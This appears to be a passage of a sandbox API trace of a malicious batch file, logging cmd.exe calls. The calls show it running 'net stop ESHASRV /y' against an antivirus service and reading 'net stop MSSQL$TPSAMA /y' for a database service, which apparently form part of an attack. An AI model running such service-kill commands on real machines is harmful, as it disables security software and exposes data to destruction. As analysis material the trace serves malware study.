0x3f6d58 [0209.605] GetProcessHeap () returned 0x3e0000 [0209.605] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0209.605] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.605] GetProcessHeap () returned 0x3e0000 [0209.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0209.605] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0209.606] GetProcessHeap () returned 0x3e0000 [0209.606] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0209.606] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.606] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.606] GetLastError () returned 0x2 [0209.607] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.607] GetLastError () returned 0x2 [0209.607] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.608] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.608] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.608] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.608] GetLastError () returned 0x2 [0209.609] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.609] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.609] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.610] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0209.610] SetErrorMode (uMode=0x0) returned 0x1 [0209.610] GetProcessHeap () returned 0x3e0000 [0209.610] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0209.610] GetProcessHeap () returned 0x3e0000 [0209.610] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0209.610] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.610] GetProcessHeap () returned 0x3e0000 [0209.610] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0209.610] GetProcessHeap () returned 0x3e0000 [0209.610] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0209.610] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0209.611] GetProcessHeap () returned 0x3e0000 [0209.611] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0209.611] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.611] GetProcessHeap () returned 0x3e0000 [0209.611] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0209.611] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0209.611] GetProcessHeap () returned 0x3e0000 [0209.611] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0209.611] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.612] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.612] GetLastError () returned 0x2 [0209.612] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.612] GetLastError () returned 0x2 [0209.613] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.613] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0209.613] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0209.614] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.614] GetLastError () returned 0x2 [0209.614] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0209.614] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0209.614] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.615] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0209.615] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0209.615] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0209.615] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.615] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ESHASRV /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ESHASRV /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ESHASRV /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x418, dwThreadId=0x6e0)) returned 1 [0209.619] CloseHandle (hObject=0x78) returned 1 [0209.619] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.619] GetProcessHeap () returned 0x3e0000 [0209.619] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.619] GetEnvironmentStringsW () returned 0x3f8408* [0209.619] GetProcessHeap () returned 0x3e0000 [0209.619] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.620] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.620] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0209.745] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0209.745] CloseHandle (hObject=0x74) returned 1 [0209.745] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0209.745] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0209.745] GetProcessHeap () returned 0x3e0000 [0209.745] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.745] GetEnvironmentStringsW () returned 0x3f8408* [0209.745] GetProcessHeap () returned 0x3e0000 [0209.745] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.746] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.746] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.746] GetProcessHeap () returned 0x3e0000 [0209.746] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.746] GetEnvironmentStringsW () returned 0x3f8408* [0209.746] GetProcessHeap () returned 0x3e0000 [0209.746] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.746] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.746] GetProcessHeap () returned 0x3e0000 [0209.747] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0209.747] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0209.747] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.747] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0209.747] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.747] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0209.747] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.747] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0209.747] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.747] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0209.747] SetConsoleInputExeNameW () returned 0x1 [0209.748] GetConsoleOutputCP () returned 0x1b5 [0209.748] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0209.748] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0209.748] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0209.748] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.748] SetFilePointer (in: hFile=0x74, lDistanceToMove=4637, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x121d [0209.748] GetProcessHeap () returned 0x3e0000 [0209.748] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0209.748] GetProcessHeap () returned 0x3e0000 [0209.748] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0209.748] GetProcessHeap () returned 0x3e0000 [0209.748] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0209.748] GetProcessHeap () returned 0x3e0000 [0209.748] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0209.748] GetProcessHeap () returned 0x3e0000 [0209.748] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0209.748] GetProcessHeap () returned 0x3e0000 [0209.748] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0209.748] GetProcessHeap () returned 0x3e0000 [0209.748] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0209.748] GetProcessHeap () returned 0x3e0000 [0209.748] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0209.748] GetProcessHeap () returned 0x3e0000 [0209.749] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0209.749] GetProcessHeap () returned 0x3e0000 [0209.749] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0209.749] GetProcessHeap () returned 0x3e0000 [0209.749] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0209.749] GetProcessHeap () returned 0x3e0000 [0209.749] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0209.749] GetProcessHeap () returned 0x3e0000 [0209.749] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0209.749] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.749] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x121d [0209.749] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x6a4, lpOverlapped=0x0) returned 1 [0209.749] SetFilePointer (in: hFile=0x74, lDistanceToMove=4663, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1237 [0209.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$TPSAMA /y\r\n\r\n12 /y\r\neΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 26 [0209.749] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.749] GetFileType (hFile=0x74) returned 0x1 [0209.749] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.749] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1237 [0209.750] GetProcessHeap () returned 0x3e0000 [0209.750] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0209.750] GetProcessHeap () returned 0x3e0000 [0209.750] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0209.753] _tell (_FileHandle=3) returned 4663 [0209.753] _close (_FileHandle=3) returned 0 [0209.753] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0209.753] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0209.753] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0209.753] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0209.753] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0209.753] _wcsicmp (_String1="net", _String2="CD") returned 11 [0209.753] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0209.753] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0209.753] _wcsicmp (_String1="net", _String2="REN") returned -4 [0209.753] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0209.753] _wcsicmp (_String1="net", _String2="SET") returned -5 [0209.753] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0209.753] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0209.753] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0209.753] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0209.753] _wcsicmp (_String1="net", _String2="MD") returned 1 [0209.753] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0209.753] _wcsicmp (_String1="net", _String2="RD") returned -4 [0209.753] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0209.753] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0209.753] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0209.753] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0209.754] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0209.754] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0209.754] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0209.754] _wcsicmp (_String1="net", _String2="VER") returned -8 [0209.754] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0209.754] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0209.754] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0209.754] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0209.754] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0209.754] _wcsicmp (_String1="net", _String2="START") returned -5 [0209.754] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0209.754] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0209.754] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0209.754] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0209.754] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0209.754] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0209.754] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0209.754] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0209.754] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0209.754] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0209.754] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0209.754] SetErrorMode (uMode=0x0) returned 0x1 [0209.754] GetProcessHeap () returned 0x3e0000 [0209.754] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0209.755] GetProcessHeap () returned 0x3e0000 [0209.755] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0209.755] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.755] GetProcessHeap () returned 0x3e0000 [0209.755] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0209.755] GetProcessHeap () returned 0x3e0000 [0209.755] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0209.755] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0209.755] GetProcessHeap () returned 0x3e0000 [0209.755] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0209.755] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.755] GetProcessHeap () returned 0x3e0000 [0209.755] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0209.756] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0209.756] GetProcessHeap () returned 0x3e0000 [0209.756] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0209.756] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.757] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.757] GetLastError () returned 0x2 [0209.757] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.757] GetLastError () returned 0x2 [0209.758] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.758] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.758] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.758] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.759] GetLastError () returned 0x2 [0209.759] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.759] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.759] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.760] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0209.760] SetErrorMode (uMode=0x0) returned 0x1 [0209.760] GetProcessHeap () returned 0x3e0000 [0209.760] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0209.760] GetProcessHeap () returned 0x3e0000 [0209.760] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0209.760] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.760] GetProcessHeap () returned 0x3e0000 [0209.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0209.761] GetProcessHeap () returned 0x3e0000 [0209.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0209.761] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0209.761] GetProcessHeap () returned 0x3e0000 [0209.761] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0209.761] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.761] GetProcessHeap () returned 0x3e0000 [0209.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0209.761] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0209.761] GetProcessHeap () returned 0x3e0000 [0209.761] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0209.762] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.762] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.762] GetLastError () returned 0x2 [0209.763] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.763] GetLastError () returned 0x2 [0209.763] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.763] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.764] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.764] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.764] GetLastError () returned 0x2 [0209.764] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.765] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.765] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.765] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0209.765] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0209.765] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 